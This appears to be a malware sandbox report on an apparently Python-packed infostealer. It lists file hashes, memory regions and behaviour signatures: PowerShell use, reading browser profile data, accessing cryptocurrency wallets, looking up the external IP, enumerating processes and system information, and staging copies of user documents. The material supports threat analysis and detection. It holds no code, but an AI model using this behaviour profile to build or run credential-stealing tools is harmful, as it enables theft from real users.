| SHA512 | 086c5e628b25bc7531c2e2f73f45aa8f2182ac12f11f735b3adc33b65a078a62f7032daa58cc505310b26b4085cae91cb4fa0a3225fbe6f2b2f93287fee34d4c |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_hashlib.pyd
| MD5 | 82d28639895b87f234a80017a285822a |
| SHA1 | 9190d0699fa2eff73435adf980586c866639205f |
| SHA256 | 9ec1d9abac782c9635cdbbb745f6eab8d4c32d6292eebb9efd24a559260cb98e |
| SHA512 | 4b184dcc8ccf8af8777a6192af9919bcebcdcddd2a3771ed277d353f3c4b8cb24ffa30e83ff8fbeca1505bf550ea6f46419a9d13fef7d2be7a8ac99320350cfe |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_decimal.pyd
| MD5 | 072e08b39c18b779446032bf2104247b |
| SHA1 | a7ddad40ef3f0472e3c9d8a9741bd97d4132086c |
| SHA256 | 480b8366a177833d85b13415e5bb9b1c5fda0a093ea753940f71fa8e7fc8ed9b |
| SHA512 | c3cdfe14fd6051b92eeff45105c093dce28a4dcfd9f3f43515a742b9a8ee8e4a2dce637e9548d21f99c147bac8b9eb79bcbcd5fc611197b52413b8a62a68da02 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\_bz2.pyd
| MD5 | db5ec505d7c19345ca85d896c4bd7ef4 |
| SHA1 | c459bb6750937fbdc8ca078a74fd3d1e8461b11c |
| SHA256 | d3fb8bad482505eb4069fa2f2bb79e73f369a4181b7acc7abe9035ecbd39cec9 |
| SHA512 | 0d9fdb9054e397bc9035301e08532dc20717ec73ad27cf7134792a859ca234ab0cd4afa77d6cb2db8c35b7b0bccf49935630b3fe1bd0a83a9be228b9c3d8c629 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\unicodedata.pyd
| MD5 | 26f7ccda6ba4de5f310da1662f91b2ba |
| SHA1 | 5fb9472a04d6591ec3fee7911ad5b753c62ecf17 |
| SHA256 | 1eae07acffb343f4b3a0abbaf70f93b9ec804503598cfffdeec94262b3f52d60 |
| SHA512 | 0b5e58945c00eefc3b9f21a73359f5751966c58438ae9b86b6d3ffd0f60a648676b68a0109fa2fe1260d1b16c16b026e0c1d596fec3443638d4ce05ea04665ca |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\sqlite3.dll
| MD5 | dcc391b3b52bac0f6bd695d560d7f1a9 |
| SHA1 | a061973a5f7c52c34a0b087cc918e29e3e704151 |
| SHA256 | 762adf4e60bff393fba110af3d9694cbbdc3c6b6cd18855a93411ea8e71a4859 |
| SHA512 | 42a2606783d448200c552389c59cbf7c5d68a00911b36e526af013e9b8e3a1daa80327cb30efe0fe56323635cc2cb37bd3474b002058ba59f65e2a9d8f6046b8 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\select.pyd
| MD5 | 062f0a9179c51d7ed621dac3dd222abd |
| SHA1 | c7b137a2b1e7b16bfc6160e175918f4d14cf107c |
| SHA256 | 91bea610f607c8a10c2e70d687fb02c06b9e1e2fa7fcfab355c6baea6eddb453 |
| SHA512 | b5a99efd032f381d63bc46c9752c1ddec902dae7133a696e20d3d798f977365caf25874b287b19e6c52f3e7a8ae1beb3d7536cd114775dc0af4978f21a9e818e |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\libssl-1_1.dll
| MD5 | eac369b3fde5c6e8955bd0b8e31d0830 |
| SHA1 | 4bf77158c18fe3a290e44abd2ac1834675de66b4 |
| SHA256 | 60771fb23ee37b4414d364e6477490324f142a907308a691f3dd88dc25e38d6c |
| SHA512 | c51f05d26fda5e995fe6763877d4fcdb89cd92ef2d6ee997e49cc1ee7a77146669d26ec00ad76f940ef55adae82921dede42e55f51bd10d1283ecfe7c5009778 |
C:\Users\Admin\AppData\Local\Temp\_MEI25282\libcrypto-1_1.dll
| MD5 | daa2eed9dceafaef826557ff8a754204 |
| SHA1 | 27d668af7015843104aa5c20ec6bbd30f673e901 |
| SHA256 | 4dab915333d42f071fe466df5578fd98f38f9e0efa6d9355e9b4445ffa1ca914 |
| SHA512 | 7044715550b7098277a015219688c7e7a481a60e4d29f5f6558b10c7ac29195c6d5377dc234da57d9def0c217bb3d7feca332a64d632ca105503849f15e057ea |
memory/5096-54-0x00007FFEA6FD0000-0x00007FFEA6FFD000-memory.dmp
memory/5096-56-0x00007FFEA70F0000-0x00007FFEA7109000-memory.dmp
memory/5096-58-0x00007FFEA6730000-0x00007FFEA6753000-memory.dmp
memory/5096-60-0x00007FFE97290000-0x00007FFE97400000-memory.dmp
memory/5096-64-0x00007FFEA6D60000-0x00007FFEA6D6D000-memory.dmp
memory/5096-63-0x00007FFEA6FB0000-0x00007FFEA6FC9000-memory.dmp
memory/5096-66-0x00007FFEA6660000-0x00007FFEA668E000-memory.dmp
memory/5096-72-0x00007FFE96890000-0x00007FFE96C05000-memory.dmp
memory/5096-71-0x000001BF3C030000-0x000001BF3C3A5000-memory.dmp
memory/5096-70-0x00007FFE96CE0000-0x00007FFE96D98000-memory.dmp
memory/5096-73-0x00007FFE97840000-0x00007FFE97E29000-memory.dmp
memory/5096-80-0x00007FFEA6610000-0x00007FFEA661D000-memory.dmp
memory/5096-82-0x00007FFE96770000-0x00007FFE9688C000-memory.dmp
memory/5096-79-0x00007FFEAAAE0000-0x00007FFEAAB04000-memory.dmp
memory/5096-75-0x00007FFEA0AC0000-0x00007FFEA0AD4000-memory.dmp
memory/4288-88-0x000001DC7DA00000-0x000001DC7DA22000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mkzb4fdv.trg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
\??\c:\Users\Admin\AppData\Local\Temp\cjmodovl\cjmodovl.cmdline
| MD5 | 72fb388fb1fb36a7303f43dda7f3d5a2 |
| SHA1 | f5dbb4b6bf3e7076f402b3abc04f853bfc011cd5 |
| SHA256 | 64f4ce8b88defd20abc3bfbcd9ab03078c2a27be11041ce20120d5d3d45dc527 |
| SHA512 | 8fabcb3b68d7162b4b2baf31aaec444f4826ee36fd79c0704c2df7e01dd9c00a7da924c18bd21fb10c9c2fe84dbb79ba80bef1fdcd2b20256270d11c959ab9bc |
\??\c:\Users\Admin\AppData\Local\Temp\cjmodovl\cjmodovl.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\cjmodovl\CSCDFC7E7C12BCE4A51BE5DBD8CF3DBD10.TMP
| MD5 | 527b9a0f14cb62205aba62527266b91b |
| SHA1 | a4caedd37441c8c789d8efefd2fe493ba1f78233 |
| SHA256 | bd87bed0aa42d06e8ed2397c49e7006d03192bb3d4cf89c616941c8e9b053283 |
| SHA512 | 9e01905cd101927388591ac272806f46ecb7e31c42d7a9434089e68a7a1749bb3981c56d9d82b2eb931aab8e6610ac3ee3ddb118dcfa416a6ce860da972195dc |
C:\Users\Admin\AppData\Local\Temp\RES6580.tmp
| MD5 | 5b37e5fd3d8fa7288580011fa6ecb145 |
| SHA1 | b4c6e4a2ab11df8bcd53cdab7e0a4c44c21f94e9 |
| SHA256 | cd044f98ea83c36d8328224ba6d61c732d307a29426e6c91dd0751257b6b4413 |
| SHA512 | b2bf89e42a489d57ec8f11f58cb5b309394bb74720ba87e56d0232a6af582651a7804e800c928403a3b7cab680c92e54ccfbefcbbf327871047859daf48808a0 |
C:\Users\Admin\AppData\Local\Temp\cjmodovl\cjmodovl.dll
| MD5 | 3fb66e9df49a7dcdc7ebd503269e9225 |
| SHA1 | 973e2d1a225643999ea1682ba0faa4abb11b8631 |
| SHA256 | 05793c969468237b88c3981519a38ebdef5f8d84217c6ee38b481d04c57c9d21 |
| SHA512 | 6f131ea585976c9d6a63f4cb55493a4fb345fc88bdecb73a74ee6b7efa4cdf9c4f0d037ee1cf6f15bd874b33bd6967ff67171f156bf9a95c9eb513c28099c806 |
memory/992-201-0x0000021CA1650000-0x0000021CA1658000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 8740e7db6a0d290c198447b1f16d5281 |
| SHA1 | ab54460bb918f4af8a651317c8b53a8f6bfb70cd |
| SHA256 | f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5 |
| SHA512 | d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 55477ffee61aa2228c53f46f79aa347b |
| SHA1 | c84a730dd80964da4bcd095c4c147f99979a75e7 |
| SHA256 | 26164bcf29aaf21058c9df80ce221b2d7d89a1e877b607509a3acb28ee9d51c5 |
| SHA512 | ad610bd3fcaf61ee766c60640d583d27fc6ec5222ce4579b3ca49748aaf0d63dbc0b94423933e8b26da67edd4d6ce515439dc6427c0e29166cd8e10b5f34c132 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\EnterBackup.mhtml
| MD5 | 79b1f34af3adcdb50dd8658d1d3a3c72 |
| SHA1 | 69b23b6294c3ade09b1766d7af887c414c0fd7ed |
| SHA256 | 0553eeeea47d4f7f413d9c6cfc7638fd903b71e1a83561592e9e19c537d04f98 |
| SHA512 | bf25e8af3533cdad3c232865a34224f892f65ddf92f65b562c1da0c508422457d8627184b0455fa46b9366b71a84680c0af388176f52cbd98a01491d5afae7ca |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Desktop\SyncAssert.xlsx
| MD5 | 37ccab46026dd7ca51d90dd17d0528ce |
| SHA1 | da1571e5292e278fc24b9314d906746e252b1777 |
| SHA256 | 0363e2f030b2047b19bcc15da683de580ca4962c00a70c497a68e0f6b9325fd9 |
| SHA512 | a57c96f550335ce475e988bd94c40fb88084744fb685ed101467060c6185bdbad5f842f0e0cc5ae1c47476d9c8ecfe4f97b28d604b901e3dd84c2027221b8e26 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Are.docx
| MD5 | a33e5b189842c5867f46566bdbf7a095 |
| SHA1 | e1c06359f6a76da90d19e8fd95e79c832edb3196 |
| SHA256 | 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454 |
| SHA512 | f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\BackupPush.xps
| MD5 | c368590170a97b09426f8c2b7215140c |
| SHA1 | 3a3fc1022571a691a98adf6c117e6850fbf83f8d |
| SHA256 | e340d5978894c9416640c94cf4acf519c13addcd14adbdfa8a120c216a850620 |
| SHA512 | 757f099c4fc5430c26b67b9bbcf9b8cb2fe6cd99f1ea3806f8c0bfa2e55497e9474d08f2be62fa15c1ee68a70dbb36de174f7b688e38fbb77658b56e4c6589e7 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\CompareRegister.xls
| MD5 | ed9170e640596148983e6c96cf6cff6f |
| SHA1 | 0372c72876466b4c17dcac09046c5c8b47fdf8a5 |
| SHA256 | 98e77c081deda105c05e43ee73505e4dbbb65b757e2a7fa45b53ccda2be1f8b4 |
| SHA512 | 28d146552ed9b2c210a530be33f3586c0173bb8bec8a865e364a0c810d49198b15b33f61744b3838568f0f75072219da4894e8c2325411cabcfbde44dbd1717e |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\EditCompare.pdf
| MD5 | 493b30400f99969536431a3640bc4851 |
| SHA1 | 22716d986a00aeac7774f04d51ebf7dbc8302394 |
| SHA256 | d3e420df3b4a555870b72d2a4e0c51cb0767a7e5d39c0ec1ef04ebc113dfff36 |
| SHA512 | ce44f02db3684946c85508fd0cfead2acd0ca8a3538b3ed22fa50df07be67d229551b8449653c3f9f77535cbf67ea49d4fbcfd5070034d39808e90eef0fd3127 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Files.docx
| MD5 | 4a8fbd593a733fc669169d614021185b |
| SHA1 | 166e66575715d4c52bcb471c09bdbc5a9bb2f615 |
| SHA256 | 714cd32f8edacb3befbfc4b17db5b6eb05c2c8936e3bae14ea25a6050d88ae42 |
| SHA512 | 6b2ebbbc34cd821fd9b3d7711d9cdadd8736412227e191883e5df19068f8118b7c80248eb61cc0a2f785a4153871a6003d79de934254b2c74c33b284c507a33b |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\FindReset.txt
| MD5 | 9e63624f3487f45fa5bdefce5101ee09 |
| SHA1 | 038ce4029d97feac7066dbc938dcdf2653414115 |
| SHA256 | c49fab4691ca8773bed0e9f9402cf75f8f632ef820dba83c31b5f5683bd9908a |
| SHA512 | 810c80e4b7851c6703def38160d212e2e9cf554c4f7e471f74822f02c7f5a6563955f098352b43e1ec4df74d5a97e5421c755501f486a668b3122a21d82c78d3 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Opened.docx
| MD5 | bfbc1a403197ac8cfc95638c2da2cf0e |
| SHA1 | 634658f4dd9747e87fa540f5ba47e218acfc8af2 |
| SHA256 | 272ed278e82c84cf4f80f48ec7989e1fc35f2055d6d05b63c8a31880846597a6 |
| SHA512 | b8938526fcbf7152805aec130ca553e3ec949cb825430a5d0a25c90ec5eb0863857010484a4b31fdc4bb65a4c92ad7127c812b93114be4569a677f60debe43b1 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SaveWait.xlsx
| MD5 | 347061b7ecb8ed9b45c4465843e47cd9 |
| SHA1 | 662376155c439295b7d1b51a2e5c959aa2b6db36 |
| SHA256 | 86999fe4ccaba5994d35050188249506c27cc71e236168cbf16051482b3092c4 |
| SHA512 | 1a34ced24adc3a57665899e8c4b44d2cfba0f08a43aca8645532310ef12e7c77f1a031e3e8b2495c71e6d3ad4480a57fed49f2dc031ae4e36a25799c87ba14ce |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\Recently.docx
| MD5 | 3b068f508d40eb8258ff0b0592ca1f9c |
| SHA1 | 59ac025c3256e9c6c86165082974fe791ff9833a |
| SHA256 | 07db44a8d6c3a512b15f1cb7262a2d7e4b63ced2130bc9228515431699191cc7 |
| SHA512 | e29624bc8fecb0e2a9d917642375bd97b42502e5f23812195a61a4920cae5b6ed540e74dfcf8432dcceb7de906ad0501cdd68056f9b0ec86a6bb0c1e336bfe32 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\SyncCopy.csv
| MD5 | 5e2f2496ea2956a1ab5ff3165ade1457 |
| SHA1 | 3047a197bc84a0ab93f867646ad9b001cfcb0cb4 |
| SHA256 | 787b63a2785264b6a1188d3279bbf640fb31e4341be36d0f09e460ea8462b85d |
| SHA512 | e56699b6b5ac6ed437478708265b47715aed3fab385e5e871702cbd33df9ceecd43e9508be4b4a05ddbb7ce90711c2dfb0fdf5377113a49bf23a2f397fe01436 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\These.docx
| MD5 | 87cbab2a743fb7e0625cc332c9aac537 |
| SHA1 | 50f858caa7f4ac3a93cf141a5d15b4edeb447ee7 |
| SHA256 | 57e3b0d22fa619da90237d8bcf8f922b142c9f6abf47efc5a1f5b208c4d3f023 |
| SHA512 | 6b678f0dd0030806effe6825fd52a6a30b951e0c3dcf91dfd7a713d387aa8b39ec24368e9623c463360acba5e929e268f75ce996526c5d4485894b8ac6b2e0fa |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\UninstallUnpublish.csv
| MD5 | ceadb733b1534869d0d69e323713af09 |
| SHA1 | 80d19e8d357e43ced3af83041c3327dd6d2cd89a |
| SHA256 | 95f603f55f2b26ca89d77561f507e1393d01e3279cd311984d0609e3bef65e72 |
| SHA512 | 7690fa6216d571f56cc528f84a56dd138ec8829940e22ec794bbf0f5c6b0907a52143f3422aa3c711be45b944317e5290bae0974d7e17bd78fb99a18b1a6dae8 |
C:\Users\Admin\AppData\Local\Temp\ \Common Files\Documents\UpdateWrite.doc
| MD5 | b1bd7474a1f03b7c088984808bb66d58 |
| SHA1 | 7873c765934599d8a1c7f61db1e4b9f8f1660e5d |
| SHA256 | c847259e68e05b8b2e84fff236d47a3152e2089c832043973a5033fec25b576e |
| SHA512 | ffa393f29c5707702ed699e8fd64e84858c15f358ac83849ea5ccfbf823e8215a2fe406750f58f6c4a0fb0cc29377365dbfb54d2d16a4998a8891057ab6def0c |
memory/5096-265-0x00007FFEA6730000-0x00007FFEA6753000-memory.dmp
memory/5096-286-0x00007FFE97290000-0x00007FFE97400000-memory.dmp
memory/5096-288-0x00007FFEAAAE0000-0x00007FFEAAB04000-memory.dmp
memory/5096-302-0x00007FFEA6FB0000-0x00007FFEA6FC9000-memory.dmp
memory/5096-301-0x00007FFE96770000-0x00007FFE9688C000-memory.dmp
memory/5096-297-0x00007FFE96CE0000-0x00007FFE96D98000-memory.dmp
memory/5096-296-0x00007FFEA6660000-0x00007FFEA668E000-memory.dmp
memory/5096-287-0x00007FFE97840000-0x00007FFE97E29000-memory.dmp
memory/5096-298-0x00007FFE96890000-0x00007FFE96C05000-memory.dmp
memory/5096-303-0x000001BF3C030000-0x000001BF3C3A5000-memory.dmp
memory/5096-332-0x00007FFEA6610000-0x00007FFEA661D000-memory.dmp
memory/5096-339-0x00007FFEA6730000-0x00007FFEA6753000-memory.dmp
memory/5096-344-0x00007FFE96CE0000-0x00007FFE96D98000-memory.dmp
memory/5096-343-0x00007FFEA6660000-0x00007FFEA668E000-memory.dmp
memory/5096-342-0x00007FFEA6D60000-0x00007FFEA6D6D000-memory.dmp
memory/5096-341-0x00007FFEA6FB0000-0x00007FFEA6FC9000-memory.dmp
memory/5096-340-0x00007FFE97290000-0x00007FFE97400000-memory.dmp
memory/5096-338-0x00007FFEA70F0000-0x00007FFEA7109000-memory.dmp
memory/5096-337-0x00007FFEA6FD0000-0x00007FFEA6FFD000-memory.dmp
memory/5096-336-0x00007FFEAC8E0000-0x00007FFEAC8EF000-memory.dmp
memory/5096-335-0x00007FFEAAAE0000-0x00007FFEAAB04000-memory.dmp
memory/5096-334-0x00007FFE96890000-0x00007FFE96C05000-memory.dmp
memory/5096-333-0x00007FFE96770000-0x00007FFE9688C000-memory.dmp
memory/5096-331-0x00007FFEA0AC0000-0x00007FFEA0AD4000-memory.dmp
memory/5096-319-0x00007FFE97840000-0x00007FFE97E29000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-30 19:13
Reported
2024-05-30 19:17
Platform
win11-20240508-en
Max time kernel
89s
Max time network
104s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\_MEI24322\rar.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
